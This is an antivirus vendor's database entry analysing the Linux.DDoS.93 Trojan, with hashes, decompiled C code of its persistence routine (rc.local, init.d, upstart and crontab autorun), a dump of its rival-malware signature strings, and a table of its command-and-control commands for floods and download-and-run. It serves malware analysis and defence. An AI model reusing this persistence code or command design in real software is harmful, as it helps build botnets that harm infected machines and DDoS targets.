Library
My library

+ Add to library

Profile

Linux.DDoS.93

Added to the Dr.Web virus database: 2016-09-07

Virus description added:

SHA1:

  • f164721acd2e5dabaa2b802946162cbaac48aa5e (x64)
  • 76d7a2f1fcc3eeb398bba416ac5cc78072780367 (x64)
  • c3b5310eca6dce452c42e5db14a852d42b08f559 (armv6l)

The Trojan for Linux designed to carry out DDoS attacks. It is spread presumably via ShellShock vulnerabilities.

At launching, it checks for the presence of /var/run/dhcpclient-eth0.pid. file. If the Trojan cannot find this file, it attempts to register itself in autorun.

void __cdecl startup()
{
  char self_path[1023]; // [sp+0h] [bp-414h]@1
  int v1; // [sp+400h] [bp-14h]@1
  FILE *stream; // [sp+404h] [bp-10h]@3
  char v3[12]; // [sp+408h] [bp-Ch]@2
  v1 = readlink("/proc/self/exe", self_path, 0x3FFu);
  if ( v1 != -1 )
  {
    v3[v1 - 0x408] = 0;
    if ( geteuid() )
      goto LABEL_16;
    stream = fopen("/etc/rc.local", "w");
    if ( stream )
    {
      fprintf(stream, "#!/bin/sh -e\n%s\nexit 0", self_path);
      fclose(stream);
      return;
    }
    if ( !access("/etc/init.d", 0) )
    {
      rename(self_path, "/etc/init.d/dhcpclient-eth0");
      system("update-rc.d dhcpclient-eth0 defaults");
      return;
    }
    if ( !access("/etc/init", 0) )
    {
      stream = fopen("/etc/init/dhcpclient-eth0.conf", "w");
      if ( stream )
      {
        fprintf(stream, "description     \"dhcp client\"\nstart on startup\ntask\nexec %s", self_path);
        fclose(stream);
        return;
      }
    }
    stream = fopen("/etc/crontab", "a");
    if ( !stream )
    {
LABEL_16:
      system("crontab -l > tempcrontab");
      stream = fopen("tempcrontab", "a");
      if ( stream )
      {
        fprintf(stream, "\n@reboot %s\n", self_path);
        fclose(stream);
        system("crontab tempcrontab");
        remove("tempcrontab");
      }
    }
    else
    {
      fprintf(stream, "\n@reboot root %s\n", self_path);
      fclose(stream);
    }
  }
}

After that, the Trojan write-protects the /var/run/dhcpclient-eth0.pid file and disguises its own name under “-sha”. Then the Linux.DDoS.93 reads the process’s memory contents and lists executable files of the processes, using /proc, in order to find other Trojan copies. The process terminates if it matches one of the strings below.

                       signatures      dq offset aPrivmsg      ; DATA XREF: dump_memory+1A0r
.data:00000000006066C0                                         ; dump_file+ABr
.data:00000000006066C0                                         ; "privmsg"
.data:00000000006066C8                 dq offset aGetlocalip   ; "getlocalip"
.data:00000000006066D0                 dq offset aKaiten       ; "kaiten"
.data:00000000006066D8                 dq offset aBrianKrebs   ; "brian krebs"
.data:00000000006066E0                 dq offset aBotnet       ; "botnet"
.data:00000000006066E8                 dq offset aBitcoinMine  ; "bitcoin mine"
.data:00000000006066F0                 dq offset aLitecoinMine ; "litecoin mine"
.data:00000000006066F8                 dq offset aRootkit      ; "rootkit"
.data:0000000000606700                 dq offset aKeylogger    ; "keylogger"
.data:0000000000606708                 dq offset aDdosing      ; "ddosing"
.data:0000000000606710                 dq offset aNulling      ; "nulling"
.data:0000000000606718                 dq offset aHackforums   ; "hackforums"
.data:0000000000606720                 dq offset aSkiddie      ; "skiddie"
.data:0000000000606728                 dq offset aScriptKiddie ; "script kiddie"
.data:0000000000606730                 dq offset aBlackhat     ; "blackhat"
.data:0000000000606738                 dq offset aWhitehat     ; "whitehat"
.data:0000000000606740                 dq offset aGreyhat      ; "greyhat"
.data:0000000000606748                 dq offset aGrayhat      ; "grayhat"
.data:0000000000606750                 dq offset aDoxing       ; "doxing"
.data:0000000000606758                 dq offset aMalware      ; "malware"
.data:0000000000606760                 dq offset aBootkit      ; "bootkit"
.data:0000000000606768                 dq offset aRansomware   ; "ransomware"
.data:0000000000606770                 dq offset aSpyware      ; "spyware"
.data:0000000000606778                 dq offset aBotkiller    ; "botkiller"

The Trojan generates its identifier that looks as follows: [A-Z0-9]{20}.

After that the Linux.DDoS.93 creates two child processes. The first one exchanges data with a command and control server. The second one verifies the parent process is running in an infinite loop (if not, launches it). The parent process then does the same for the child process—thus the Trojan works continuously on the infected computer.

The module executes the following commands:

CommandParametersPurpose
DNXHost URLDownload and run the file. It is saved with the name getbinaries
GETHost port page timeLaunch a HTTP flood attack using GET requests
HEADHost port page timeLaunch a HTTP flood attack using HEAD requests
PING Send a PING command
POSTHost port page time postparamsLaunch a HTTP flood attack using POST requests
RCDHost port timeLaunch a TCP flood attack (random data up to 4096 B long is added to the packages)
RUDPHost timeLaunch a UDP flood attack on a random port
SCANNERMethod port page params useragentSend HTTP requests with the specified parameters to 255 random IP addresses
SUDPHost port timeLaunched a Spoofed UDP flood attack
TCPHost port timeLaunch a TCP flood attack
TERMINATE Terminate execution
UDPHost port timeLaunch a UDP flood attack on a specified port
UNINSTALL Remove itself
UPDATEHost URLDownload and run the file. It is saved with the name getbinaries

When the Trojan receives the command to launch a DDoS attack or a SCANNER, command, it first stops all the child processes and then launches 25 new ones which perform a scan or an attack in a way chosen by the cybercriminals.

News about the Trojan

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number